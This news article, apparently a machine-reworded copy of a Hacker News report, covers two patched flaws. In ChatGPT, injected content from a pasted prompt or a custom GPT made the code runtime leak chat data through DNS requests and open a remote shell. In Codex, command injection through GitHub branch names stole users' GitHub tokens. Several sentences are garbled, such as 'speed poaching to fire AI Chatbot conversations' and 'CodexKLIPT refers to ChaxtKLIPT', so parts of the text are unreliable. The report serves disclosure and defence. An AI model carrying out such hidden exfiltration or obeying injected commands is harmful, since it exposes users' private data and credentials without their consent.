Cyber Security

OpenAI Patches ChatGPT Data Exfiltration Flaw and Codex GitHub Token Vulnerability

A previously unknown vulnerability in OpenAI ChatGPT allowed sensitive chat data to be extracted without user knowledge or consent, according to new findings from Check Point.

“One malicious alert can turn a normal conversation into a channel for hidden surveillance, leaking user messages, uploaded files and other sensitive content,” the cybersecurity company said in a report published today. “Backend GPT can exploit the same vulnerability to gain access to user data without the user’s knowledge or consent.”

After responsible disclosure, OpenAI addressed the issue on February 20, 2026. There is no evidence that this issue was ever exploited in a malicious manner.

Although ChatGPT is built with various security mechanisms to prevent unauthorized data sharing or generating outgoing network requests, the newly discovered vulnerability completely bypasses these protections by using a side channel from the Linux runtime that is used by an artificial intelligence (AI) agent to code and analyze data.

In particular, it exploits DNS-based communication methods disguised as “secret transport” by encoding information in DNS requests to bypass the AI’s virtual routes. In addition, the same hidden communication method can be used to establish remote shell access within the Linux runtime and achieve command execution.

In the absence of a warning or confirmation box for the user, the vulnerability creates a security blind spot, with the AI ​​system assuming that the environment is isolated.

As an illustrative example, an attacker can convince a user to attach malicious information by passing it off as a way to unlock premium features for free or improve ChatGPT functionality. The threat increases when the process is embedded within a custom GPT, as malicious logic may be injected into it instead of tricking the user into pasting specially crafted information.

“Importantly, because the model was operating under the assumption that the site could not export data directly, it did not recognize that behavior as an external data transfer that required objection or user intervention,” explained Check Point. “As a result, the leak did not trigger warnings about data leaving the conversation, did not require explicit user authentication, and remained largely invisible from the user’s perspective.”

With tools like ChatGPT increasingly embedded in business environments and users uploading highly personal information, vulnerabilities like this underscore the need for organizations to use their own layer of security to resist rapid injections and other unpredictable behavior in AI systems.

“This research reinforces a stark truth of the AI ​​era: don’t assume AI tools are automatically secure,” said Eli Smadja, head of research at Check Point Research, in a statement shared with Hacker News.

“As AI platforms evolve into full computing environments that handle our most sensitive data, traditional security controls are no longer sufficient on their own. Organizations need independent visibility and layered protection between themselves and AI vendors. That’s how we move forward safely — by rethinking the AI ​​security architecture, not reacting to the next incident.”

The development comes as malicious actors have been seen publishing web browser extensions (or updating existing ones) that engage in the dubious practice of speed poaching to fire AI Chatbot conversations without user consent, highlighting how seemingly harmless add-ons can become a channel for data mining.

“It’s almost clear that these plugins open the door to several risks, including identity theft, targeted phishing campaigns, and sensitive data being sold on underground platforms,” ​​said Expel researcher Ben Nahorney. “In the case of organizations where employees may inadvertently install these extensions, they may expose intellectual property, customer data, or other confidential information.”

Command Injection Vulnerability in OpenAI Codex Leads to GitHub Token Compromise

The findings also coincide with the discovery of a command injection vulnerability in OpenAI’s Codex, a cloud-based software engineering agent, which may have been exploited to steal GitHub authentication data and ultimately compromise many users using the shared repository.

“The vulnerability exists within an HTTP request to create a function, which allows an attacker to smuggle arbitrary commands using the GitHub branch name parameter,” said BeyondTrust Phantom Labs researcher Tyler Jespersen in a report shared with Hacker News. “This can lead to the theft of the victim’s GitHub User Access Token – the same token that Codex uses to authenticate with GitHub.”

The problem, according to BeyondTrust, stems from improper sanitization when processing GitHub branch names during cloud execution. Because of this flaw, an attacker can insert arbitrary commands using the branchname parameter in an HTTPS POST request to the Codex API backend, execute a malicious payload inside the agent container, and return sensitive authentication tokens.

“This allowed for cross-platform and read/write access to the victim’s entire codebase,” said Kinnaird McQuade, senior security architect at BeyondTrust, in a post on X. Written by OpenAI as of February 5, 2026, after being reported on December 16, 2025. Codex website, CodexKLIPT refers to ChaxtKLIPT Codex IDE Extension.

The cybersecurity vendor said the branch command injection method can be extended to steal access tokens for GitHub installations and execute bash commands in the code review container whenever @codex is referenced on GitHub.

“With the suspension of the malicious branch, we referred Codex to the comments via a pull request (PR),” he explained. “Codex then starts a code review container and builds a job against our repository and branch, releases our payload and forwards the response to our external server.”

The study also highlights the growing risk that privileged access granted by AI coding agents can be leveraged to provide a “vulnerable attack surface” on business systems without triggering traditional security controls.

“As AI agents become more deeply integrated into a developer’s workflow, the security of the containers they run in — and the inputs they use — must be treated as rigorously as any other application security boundary,” BeyondTrust said. “The attack surface is expanding, and the security of these areas must keep pace.”

Related Articles

Leave a Reply

Your email address will not be published. Required fields are marked *

Back to top button